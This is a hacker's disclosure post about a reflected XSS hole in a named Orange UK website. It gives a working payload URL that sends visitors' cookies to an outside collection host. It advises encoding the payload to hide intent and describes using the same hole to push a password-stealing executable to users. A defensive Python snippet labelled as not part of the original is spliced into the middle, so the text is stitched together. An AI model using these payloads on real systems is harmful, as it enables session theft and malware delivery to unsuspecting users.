Orange Vulnerable to XSS and phishing

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Information:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enables attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy…

More here: [ XSS ]

I just found an XSS vulnerability in the website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code, which may lead to cookie stealing.

Proof of Concept:

Link:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email="><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

c0de:

"><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

We can encode the malicious code in base64, hex, etc. in order to hide our intentions! :)

Another example for this vulnerability is phishing! :D

As everyone knows, there are programs called stealers which can steal all saved passwords from your browser.

I picked an executable program (Winamp in our case) for a demonstration.

Link to download Winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe

The malicious code:

"><iframe height="0" width="0" frameborder="0" src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe"></iframe>

Encoded in hex, it becomes:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Replace the Winamp link with another one (e.g. a stealer) and you can trick a lot of people.
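The reflected `email` parameter above, as an added Python example that is not part of the original post: it decodes a percent-encoded value the way the browser would, contrasts the assumed verbatim reflection into a quoted attribute with an HTML-escaped rendering, and gives a simple check that flags such requests in access logs. The form shape, the constructed sample URL and the placeholder host are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: the reminder endpoint shape from the post, with an
# iframe probe percent-encoded in `email`. The src is a placeholder host, not the
# original download link.
SAMPLE_URL = (
    "http://website.orange.co.uk/index.php?module=reminder&submode=sendpw"
    "&l=en_UK_orange_uk&email="
    "%22%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22http://example.invalid/x.exe"
    "%22%3e%3c%2f%69%66%72%61%6d%65%3e"
)


def email_param(url: str) -> str:
    """Return the decoded `email` query value ('' if absent); hex/URL encoding
    makes no difference once the browser or server decodes the query string."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("email", [""])[0]


def render_vulnerable(email: str) -> str:
    """Assumed shape of the original form: the value is reflected verbatim into a
    double-quoted attribute, which is why the payload starts with '">'."""
    return f'<input type="text" name="email" value="{email}">'


def render_hardened(email: str) -> str:
    """Fix: escape with quote=True so '"' cannot close the attribute and '<'
    cannot open a new tag."""
    return f'<input type="text" name="email" value="{html.escape(email, quote=True)}">'


def injected_tags(rendered: str) -> list[str]:
    """Tag names present in the rendered fragment beyond the expected <input>."""
    return [t.lower() for t in re.findall(r"<\s*([a-zA-Z]+)", rendered)
            if t.lower() != "input"]


def suspicious_request(url: str) -> bool:
    """Log-review check: flag a reminder request whose decoded email value
    contains markup characters, regardless of how it was encoded."""
    return any(c in email_param(url) for c in "<>\"'")
```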

Note: This isn't the only vulnerability which I found in orange.co.uk
#Tinkode
